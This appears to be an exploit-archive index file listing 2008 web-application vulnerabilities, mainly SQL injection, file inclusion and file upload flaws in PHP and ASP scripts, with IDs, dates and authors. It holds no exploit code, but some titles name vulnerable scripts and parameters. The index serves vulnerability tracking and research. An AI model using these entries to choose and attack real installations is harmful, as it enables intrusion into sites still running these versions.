+6456,exploits/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,webapps,php, +6457,exploits/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,webapps,php, +6460,exploits/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite - SQL Injection",2008-09-14,~!Dok_tOR!~,webapps,php, +6461,exploits/php/webapps/6461.txt,"cPanel 11.x - 'Fantastico' Local File Inclusion",2008-09-14,joker_1,webapps,php, +6462,exploits/php/webapps/6462.pl,"CzarNews 1.20 - 'cookie' SQL Injection",2008-09-15,StAkeR,webapps,php, +6464,exploits/php/webapps/6464.txt,"CzarNews 1.20 - Account Hijacking SQL Injection",2008-09-15,0ut0fbound,webapps,php, +6465,exploits/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php' SQL Injection",2008-09-15,JosS,webapps,php, +6466,exploits/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple SQL Injections",2008-09-15,SirGod,webapps,php, +6467,exploits/php/webapps/6467.txt,"iScripts EasyIndex - 'produid' SQL Injection",2008-09-16,SirGod,webapps,php, +6468,exploits/php/webapps/6468.txt,"Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,webapps,php, +6469,exploits/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,webapps,php, +6470,exploits/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp' Blind SQL Injection",2008-09-16,JosS,webapps,asp, +6473,exploits/php/webapps/6473.txt,"phpRealty 0.3 - 'INC' Remote File Inclusion",2008-09-17,ka0x,webapps,php, +6475,exploits/php/webapps/6475.txt,"PHP Crawler 0.8 - Remote File Inclusion",2008-09-17,Piker,webapps,php, +6478,exploits/php/webapps/6478.txt,"Technote 7 - 'shop_this_skin_path' Remote File Inclusion",2008-09-17,webDEViL,webapps,php, +6480,exploits/php/webapps/6480.txt,"X10media Mp3 Search Engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,webapps,php, +6482,exploits/php/webapps/6482.txt,"addalink 4 Beta - Write Approved Links",2008-09-17,Pepelux,webapps,php, +6483,exploits/php/webapps/6483.txt,"E-PHP CMS - 'article.php' SQL Injection",2008-09-18,HaCkeR_EgY,webapps,php, +6485,exploits/php/webapps/6485.txt,"addalink 4 - 'category_id' SQL Injection",2008-09-18,ka0x,webapps,php, +6486,exploits/php/webapps/6486.txt,"ProArcadeScript 1.3 - 'random' SQL Injection",2008-09-18,SuNHouSe2,webapps,php, +6487,exploits/php/webapps/6487.txt,"CYASK 3.x - 'neturl' Local File Disclosure",2008-09-18,xy7,webapps,php, +6488,exploits/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php' SQL Injection",2008-09-18,SarBoT511,webapps,php, +6489,exploits/php/webapps/6489.txt,"ProActive CMS - 'template' Local File Inclusion",2008-09-18,r45c4l,webapps,php, +6490,exploits/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation",2008-09-18,"Neo Anderson",webapps,php, +6492,exploits/php/webapps/6492.php,"Pluck CMS 4.5.3 - 'update.php' Remote File Corruption",2008-09-19,Nine:Situations:Group,webapps,php, +6494,exploits/php/webapps/6494.txt,"easyLink 1.1.0 - 'detail.php' SQL Injection",2008-09-19,"Egypt Coder",webapps,php, +6495,exploits/php/webapps/6495.txt,"Explay CMS 2.1 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2008-09-19,hodik,webapps,php, +6499,exploits/php/webapps/6499.txt,"Advanced Electron Forum 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",webapps,php, +6500,exploits/php/webapps/6500.txt,"Explay CMS 2.1 - Insecure Cookie Handling",2008-09-20,Stack,webapps,php, +6501,exploits/php/webapps/6501.txt,"MyFWB 1.0 - 'index.php' SQL Injection",2008-09-20,0x90,webapps,php, +6502,exploits/php/webapps/6502.txt,"Diesel Pay Script - 'area' SQL Injection",2008-09-20,ZoRLu,webapps,php, +6503,exploits/php/webapps/6503.txt,"Plaincart 1.1.2 - 'p' SQL Injection",2008-09-20,r45c4l,webapps,php, +6504,exploits/php/webapps/6504.txt,"Oceandir 2.9 - 'show_vote.php' SQL Injection",2008-09-20,"JEEN HACKER TEAM",webapps,php, +6505,exploits/php/webapps/6505.txt,"jPORTAL 2 - 'humor.php' SQL Injection",2008-09-20,r45c4l,webapps,php, +6507,exploits/php/webapps/6507.php,"Invision Power Board 2.3.5 - SQL Injection",2008-09-21,waraxe,webapps,php, +6508,exploits/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - SQL Injection",2008-09-21,0x90,webapps,php, +6509,exploits/cgi/webapps/6509.txt,"TWiki 4.2.2 - 'action' Remote Code Execution",2008-09-21,webDEViL,webapps,cgi, +6510,exploits/php/webapps/6510.txt,"PHPKB 1.5 Professional - Multiple SQL Injections",2008-09-21,d3v1l,webapps,php, +6511,exploits/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' SQL Injection",2008-09-21,"Hussin X",webapps,php, +6512,exploits/php/webapps/6512.txt,"Diesel Job Site - 'job_id' Blind SQL Injection",2008-09-21,Stack,webapps,php, +6513,exploits/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",webapps,php, +6514,exploits/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,webapps,php, +6516,exploits/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - SQL Injection",2008-09-21,boom3rang,webapps,php, +6517,exploits/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,Encrypt3d.M!nd,webapps,php, +6518,exploits/php/webapps/6518.txt,"Netartmedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,Encrypt3d.M!nd,webapps,php, +6519,exploits/php/webapps/6519.php,"PHP iCalendar 2.24 - 'cookie_language' Local File Inclusion / Arbitrary File Upload",2008-09-21,EgiX,webapps,php, +6520,exploits/php/webapps/6520.txt,"6rbScript 3.3 - 'section.php' Local File Inclusion",2008-09-21,Stack,webapps,php, +6521,exploits/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,webapps,php, +6522,exploits/php/webapps/6522.txt,"AvailScript Article Script - 'view.php' SQL Injection",2008-09-21,"Hussin X",webapps,php, +6523,exploits/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin",2008-09-22,"CWH Underground",webapps,php, +6524,exploits/php/webapps/6524.txt,"WSN Links 2.22/2.23 - 'vote.php' SQL Injection",2008-09-22,d3v1l,webapps,php, +6525,exploits/php/webapps/6525.txt,"WSN Links 2.20 - 'comments.php' SQL Injection",2008-09-22,d3v1l,webapps,php, +6526,exploits/php/webapps/6526.txt,"PHP iCalendar 2.24 - Insecure Cookie Handling",2008-09-22,Stack,webapps,php, +6527,exploits/php/webapps/6527.txt,"BuzzyWall 1.3.1 - 'search' SQL Injection",2008-09-22,~!Dok_tOR!~,webapps,php, +6528,exploits/php/webapps/6528.txt,"WCMS 1.0b - 'news_detail.asp' SQL Injection",2008-09-22,"CWH Underground",webapps,php, +6529,exploits/php/webapps/6529.php,"WSN Links Free 4.0.34P - 'comments.php' Blind SQL Injection",2008-09-22,Stack,webapps,php, +6530,exploits/php/webapps/6530.txt,"OpenElec 3.01 - 'obj' Local File Inclusion",2008-09-22,dun,webapps,php, +6531,exploits/php/webapps/6531.txt,"MyBlog 0.9.8 - Insecure Cookie Handling",2008-09-22,Pepelux,webapps,php, +6533,exploits/php/webapps/6533.txt,"basebuilder 2.0.1 - 'main.inc.php' Remote File Inclusion",2008-09-22,dun,webapps,php, +6535,exploits/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - 'list.php' SQL Injection",2008-09-22,d3v1l,webapps,php, +6536,exploits/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 - Cookie SQL Injection",2008-09-22,-SmoG-,webapps,php, +6538,exploits/php/webapps/6538.txt,"OpenRat 0.8-beta4 - 'tpl_dir' Remote File Inclusion",2008-09-23,dun,webapps,php, +6539,exploits/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE - 'mod_dir' Remote File Inclusion",2008-09-23,dun,webapps,php, +6540,exploits/php/webapps/6540.pl,"iGaming CMS 1.5 - Multiple SQL Injections",2008-09-23,StAkeR,webapps,php, +6541,exploits/php/webapps/6541.txt,"Galmeta Post CMS 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,webapps,php, +6542,exploits/php/webapps/6542.txt,"JETIK-WEB Software - 'kat' SQL Injection",2008-09-23,d3v1l,webapps,php, +6543,exploits/php/webapps/6543.txt,"Ol BookMarks Manager 0.7.5 - Local File Inclusion",2008-09-23,dun,webapps,php, +6544,exploits/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - 'code' Remote Code Execution",2008-09-23,GoLd_M,webapps,php, +6545,exploits/php/webapps/6545.txt,"HotScripts Clone - 'cid' SQL Injection",2008-09-24,"Hussin X",webapps,php, +6546,exploits/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin",2008-09-24,ka0x,webapps,php, +6547,exploits/php/webapps/6547.txt,"Ol BookMarks Manager 0.7.5 - Local File Inclusion / Remote File Inclusion / SQL Injection",2008-09-24,GoLd_M,webapps,php, +6549,exploits/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,webapps,php, +6550,exploits/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'item_id' SQL Injection",2008-09-24,GoLd_M,webapps,php, +6551,exploits/php/webapps/6551.txt,"emergecolab 1.0 - 'sitecode' Local File Inclusion",2008-09-24,dun,webapps,php, +6552,exploits/php/webapps/6552.txt,"mailwatch 1.0.4 - 'doc' Local File Inclusion",2008-09-24,dun,webapps,php, +6553,exploits/php/webapps/6553.txt,"PHPcounter 1.3.2 - 'defs.php' Local File Inclusion",2008-09-24,dun,webapps,php, +6555,exploits/php/webapps/6555.txt,"Jadu CMS for Government - 'recruit_details.php' SQL Injection",2008-09-24,r45c4l,webapps,php, +6556,exploits/php/webapps/6556.txt,"webcp 0.5.7 - 'filelocation' Remote File Disclosure",2008-09-24,GoLd_M,webapps,php, +6557,exploits/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,webapps,php, +6558,exploits/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,webapps,php, +6559,exploits/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,webapps,php, +6561,exploits/php/webapps/6561.txt,"AJ Auction Pro Platinum - 'seller_id' SQL Injection",2008-09-25,InjEctOr5,webapps,php, +6562,exploits/php/webapps/6562.txt,"LanSuite 3.3.2 - 'design' Local File Inclusion",2008-09-25,dun,webapps,php, +6563,exploits/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - 'act' Local File Inclusion",2008-09-25,dun,webapps,php, +6564,exploits/php/webapps/6564.txt,"Vikingboard 0.2 Beta - 'task' Local File Inclusion",2008-09-25,dun,webapps,php, +6566,exploits/php/webapps/6566.txt,"PHP infoboard 7 plus - Multiple Vulnerabilities",2008-09-25,"CWH Underground",webapps,php, +6567,exploits/php/webapps/6567.pl,"Libra PHP File Manager 1.18/2.0 - Local File Inclusion",2008-09-25,Pepelux,webapps,php, +6568,exploits/php/webapps/6568.txt,"PHP infoBoard 7 - Plus Insecure Cookie Handling",2008-09-25,Stack,webapps,php, +6569,exploits/php/webapps/6569.txt,"Vikingboard 0.2 Beta - SQL Column Truncation",2008-09-25,StAkeR,webapps,php, +6571,exploits/php/webapps/6571.txt,"openEngine 2.0 beta4 - Remote File Inclusion",2008-09-25,dun,webapps,php, +6572,exploits/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 - Cross-Site Scripting / SQL Injection",2008-09-25,d3v1l,webapps,php, +6573,exploits/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,webapps,php, +6574,exploits/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,webapps,php, +6575,exploits/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",webapps,php, +6576,exploits/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - 'Category' SQL Injection",2008-09-26,"CWH Underground",webapps,php, +6577,exploits/php/webapps/6577.txt,"PromoteWeb MySQL - 'id' SQL Injection",2008-09-26,"CWH Underground",webapps,php, +6578,exploits/php/webapps/6578.txt,"212Cafe Board 0.07 - 'qID' SQL Injection",2008-09-26,"CWH Underground",webapps,php, +6579,exploits/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,webapps,php, +6580,exploits/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,webapps,php, +6583,exploits/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,webapps,php, +6584,exploits/php/webapps/6584.txt,"The Gemini Portal 4.7 - Insecure Cookie Handling",2008-09-26,Pepelux,webapps,php, +6585,exploits/php/webapps/6585.txt,"openEngine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,webapps,php, +6586,exploits/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,webapps,php, +6587,exploits/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Remote File Inclusion",2008-09-26,ZoRLu,webapps,php, +6589,exploits/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' SQL Injection",2008-09-26,0x90,webapps,php, +6590,exploits/php/webapps/6590.txt,"ASPapp Knowledge Base - 'CatId' SQL Injection (2)",2008-09-27,Crackers_Child,webapps,php, +6591,exploits/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,webapps,php, +6592,exploits/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion",2008-09-27,NoGe,webapps,php, +6593,exploits/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,webapps,php, +6594,exploits/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,webapps,php, +6595,exploits/php/webapps/6595.txt,"Joovili 3.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,webapps,php, +6596,exploits/php/webapps/6596.txt,"E-Uploader Pro 1.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,webapps,php, +6598,exploits/php/webapps/6598.txt,"CoAST 0.95 - 'sections_file' Remote File Inclusion",2008-09-27,DaRkLiFe,webapps,php, +6599,exploits/php/webapps/6599.txt,"Real Estate Manager 1.01 - 'cat_id' SQL Injection",2008-09-27,CraCkEr,webapps,php, +6601,exploits/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Local File Inclusion",2008-09-27,dun,webapps,php, +6602,exploits/php/webapps/6602.txt,"PlugSpace 0.1 - 'navi' Local File Inclusion",2008-09-27,dun,webapps,php, +6603,exploits/php/webapps/6603.txt,"MyCard 1.0.2 - 'id' SQL Injection",2008-09-27,r45c4l,webapps,php, +6604,exploits/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Local Directory Traversal",2008-09-27,r45c4l,webapps,php, +6605,exploits/php/webapps/6605.txt,"PHP-Lance 1.52 - 'catid' SQL Injection",2008-09-27,InjEctOr5,webapps,php, +6606,exploits/php/webapps/6606.txt,"Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution",2008-09-27,dun,webapps,php, +6607,exploits/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,webapps,php, +6608,exploits/php/webapps/6608.txt,"ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection",2008-09-28,"Hussin X",webapps,php, +6610,exploits/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,webapps,asp, +6611,exploits/php/webapps/6611.php,"PHPcounter 1.3.2 - 'index.php' SQL Injection",2008-09-28,StAkeR,webapps,php, +6612,exploits/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - SQL Injection",2008-09-28,~!Dok_tOR!~,webapps,php, +6613,exploits/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php' SQL Injection",2008-09-28,S.W.A.T.,webapps,php, +6617,exploits/php/webapps/6617.txt,"BbZL.php 0.92 - 'lien_2' Local Directory Traversal",2008-09-28,JIKO,webapps,php, +6618,exploits/php/webapps/6618.txt,"Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,webapps,php, +6620,exploits/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - 'linkid' SQL Injection",2008-09-28,boom3rang,webapps,php, +6621,exploits/php/webapps/6621.txt,"BbZL.php 0.92 - Insecure Cookie Handling",2008-09-28,Stack,webapps,php, +6623,exploits/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",webapps,php, +6624,exploits/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' SQL Injection",2008-09-29,"Hussin X",webapps,php, +6625,exploits/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,webapps,php, +6626,exploits/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",webapps,php, +6628,exploits/php/webapps/6628.txt,"ArabCMS - 'rss.php' Local File Inclusion",2008-09-29,JIKO,webapps,php, +6629,exploits/php/webapps/6629.txt,"FAQ Management Script - 'catid' SQL Injection",2008-09-30,"Hussin X",webapps,php, +6631,exploits/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion",2008-09-30,SirGod,webapps,php, +6632,exploits/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusions",2008-09-30,DaRkLiFe,webapps,php, +6633,exploits/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Arbitrary File Upload",2008-09-30,Pepelux,webapps,php, +6634,exploits/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection",2008-09-30,Stack,webapps,php, +6635,exploits/php/webapps/6635.txt,"SG Real Estate Portal 2.0 - Insecure Cookie Handling",2008-09-30,Stack,webapps,php, +6636,exploits/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Blind SQL Injection",2008-09-30,ka0x,webapps,php, +6637,exploits/php/webapps/6637.txt,"BookMarks Favourites Script - 'id' SQL Injection",2008-09-30,"Hussin X",webapps,php, +6639,exploits/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,webapps,php, +6640,exploits/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,webapps,php, +6641,exploits/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - 'cookie' Local File Inclusion",2008-10-01,JosS,webapps,php, +6642,exploits/php/webapps/6642.txt,"BMForum 5.6 - 'tagname' SQL Injection",2008-10-01,~!Dok_tOR!~,webapps,php, +6643,exploits/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,webapps,php, +6644,exploits/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,webapps,php, +6645,exploits/php/webapps/6645.txt,"Crux Gallery 1.32 - 'theme' Local File Inclusion",2008-10-01,StAkeR,webapps,php, +6646,exploits/php/webapps/6646.php,"phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution",2008-10-01,EgiX,webapps,php, +6648,exploits/php/webapps/6648.txt,"RPortal 1.1 - 'file_op' Remote File Inclusion",2008-10-01,Kad,webapps,php, +6649,exploits/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,webapps,php, +6650,exploits/php/webapps/6650.txt,"Link Trader - 'lnkid' SQL Injection",2008-10-01,"Hussin X",webapps,php, +6652,exploits/php/webapps/6652.txt,"Bux.to Clone Script - Insecure Cookie Handling",2008-10-02,SirGod,webapps,php, +6653,exploits/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Local File Inclusion",2008-10-02,ZeN,webapps,php, +6655,exploits/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Blind SQL Injection",2008-10-02,d00m3r4ng,webapps,php, +6657,exploits/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,webapps,php, +6659,exploits/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php' SQL Injection",2008-10-03,"Hussin X",webapps,php, +6662,exploits/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,webapps,php, +6663,exploits/php/webapps/6663.txt,"CCMS 3.1 - 'skin' Local File Inclusion",2008-10-03,SirGod,webapps,php, +6664,exploits/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",webapps,php, +6667,exploits/php/webapps/6667.txt,"pPIM 1.01 - 'notes.php' Local File Inclusion",2008-10-04,JosS,webapps,php, +6669,exploits/php/webapps/6669.txt,"JMweb - 'src' Local File Inclusion",2008-10-04,SirGod,webapps,php, +6670,exploits/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Arbitrary File Upload",2008-10-04,Pepelux,webapps,php, +6674,exploits/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,JosS,webapps,php, +6675,exploits/php/webapps/6675.pl,"Galerie 3.2 - 'pic' WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,webapps,php, +6676,exploits/php/webapps/6676.txt,"OpenNMS < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",webapps,php, +6677,exploits/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' SQL Injection",2008-10-05,Piker,webapps,php, +6678,exploits/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,webapps,php, +6679,exploits/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,webapps,php, +6680,exploits/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)",2008-10-05,Pepelux,webapps,php, +6681,exploits/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' SQL Injection",2008-10-05,boom3rang,webapps,php, +6682,exploits/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' SQL Injection",2008-10-05,boom3rang,webapps,php, +6683,exploits/php/webapps/6683.txt,"PHP-Fusion Mod recept - 'kat_id' SQL Injection",2008-10-05,boom3rang,webapps,php, +6684,exploits/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - 'raceid' SQL Injection",2008-10-05,boom3rang,webapps,php, +6685,exploits/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusions",2008-10-06,NoGe,webapps,php, +6687,exploits/php/webapps/6687.pl,"Yerba SACphp 6.3 - Local File Inclusion",2008-10-06,Pepelux,webapps,php, +6691,exploits/php/webapps/6691.txt,"Yerba SACphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,webapps,php, +6692,exploits/php/webapps/6692.txt,"Joomla! Component com_hotspots - SQL Injection",2008-10-07,cOndemned,webapps,php, +6693,exploits/php/webapps/6693.txt,"Yourownbux 4.0 - 'cookie' SQL Injection",2008-10-07,Tec-n0x,webapps,php, +6694,exploits/php/webapps/6694.txt,"PHP Realtor 1.5 - 'v_cat' SQL Injection",2008-10-07,Mr.SQL,webapps,php, +6695,exploits/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - 'v_cat' SQL Injection",2008-10-07,Mr.SQL,webapps,php, +6696,exploits/php/webapps/6696.txt,"PHP Autos 2.9.1 - 'catid' SQL Injection",2008-10-07,Mr.SQL,webapps,php, +6697,exploits/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection",2008-10-07,d3v1l,webapps,php, +6698,exploits/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,webapps,php, +6700,exploits/php/webapps/6700.txt,"DFF PHP Framework API - 'Data Feed File' Remote File Inclusion",2008-10-08,GoLd_M,webapps,php, +6701,exploits/php/webapps/6701.txt,"HispaH textlinksads - 'index.php' SQL Injection",2008-10-08,InjEctOr5,webapps,php, +6702,exploits/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' SQL Injection",2008-10-08,SuB-ZeRo,webapps,php, +6703,exploits/php/webapps/6703.txt,"WebBiscuits Modules Controller 1.1 - Remote File Inclusion / Remote File Disclosure",2008-10-08,GoLd_M,webapps,php, +6706,exploits/php/webapps/6706.php,"Kusaba 1.0.4 - Remote Code Execution (1)",2008-10-09,Sausage,webapps,php, +6707,exploits/php/webapps/6707.txt,"GForge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,webapps,php, +6708,exploits/php/webapps/6708.txt,"Gforge 4.6 rc1 - 'skill_edit' SQL Injection",2008-10-09,beford,webapps,php, +6709,exploits/php/webapps/6709.txt,"Joomla! Component Joomtracker 1.01 - SQL Injection",2008-10-09,rsauron,webapps,php, +6710,exploits/php/webapps/6710.txt,"Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,webapps,php, +6711,exploits/php/webapps/6711.html,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,webapps,php, +6712,exploits/php/webapps/6712.txt,"IranMC Arad Center - SQL Injection",2008-10-09,"Hussin X",webapps,php, +6713,exploits/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,webapps,php, +6714,exploits/php/webapps/6714.pl,"Stash 1.0.3 - SQL Injection User Credentials Disclosure",2008-10-09,gnix,webapps,php, +6715,exploits/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,webapps,php, +6720,exploits/asp/webapps/6720.txt,"Ayco Okul Portali - 'linkid' SQL Injection",2008-10-10,Crackers_Child,webapps,asp, +6721,exploits/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,webapps,php, +6722,exploits/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php' SQL Injection",2008-10-10,SuB-ZeRo,webapps,php, +6723,exploits/php/webapps/6723.txt,"Joomla! Component Ignite Gallery 0.8.3 - SQL Injection",2008-10-10,H!tm@N,webapps,php, +6724,exploits/php/webapps/6724.txt,"Joomla! Component mad4Joomla! - SQL Injection",2008-10-10,H!tm@N,webapps,php, +6725,exploits/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - 'kat' SQL Injection",2008-10-10,LUPUS,webapps,asp, +6728,exploits/php/webapps/6728.txt,"Easynet4u Link Host - 'cat_id' SQL Injection",2008-10-10,BeyazKurt,webapps,php, +6729,exploits/php/webapps/6729.php,"SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation",2008-10-10,StAkeR,webapps,php, +6730,exploits/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection",2008-10-11,H!tm@N,webapps,php, +6731,exploits/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - 'xlacomments.asp' SQL Injection",2008-10-11,Hakxer,webapps,asp, +6733,exploits/php/webapps/6733.txt,"mini-pub 0.3 - File Disclosure / Code Execution",2008-10-12,muuratsalo,webapps,php, +6734,exploits/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure",2008-10-12,GoLd_M,webapps,php, +6735,exploits/php/webapps/6735.php,"Globsy 1.0 - Remote File Rewriting",2008-10-12,StAkeR,webapps,php, +6736,exploits/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'cat' SQL Injection",2008-10-12,Hakxer,webapps,php, +6737,exploits/php/webapps/6737.txt,"LokiCMS 0.3.4 - 'index.php' Arbitrary Check File",2008-10-12,JosS,webapps,php, +6739,exploits/php/webapps/6739.txt,"NewLife Blogger 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,webapps,php, +6740,exploits/php/webapps/6740.txt,"My PHP Indexer 1.0 - 'index.php' Local File Download",2008-10-12,JosS,webapps,php, +6743,exploits/php/webapps/6743.pl,"LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution",2008-10-13,girex,webapps,php, +6744,exploits/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion",2008-10-13,JosS,webapps,php, +6745,exploits/php/webapps/6745.txt,"ParsBlogger - 'links.asp' SQL Injection",2008-10-13,"Hussin X",webapps,php, +6746,exploits/php/webapps/6746.txt,"IndexScript 3.0 - 'parent_id' SQL Injection",2008-10-13,d3v1l,webapps,php, +6747,exploits/php/webapps/6747.php,"WordPress Plugin WP Comment Remix 1.4.3 - SQL 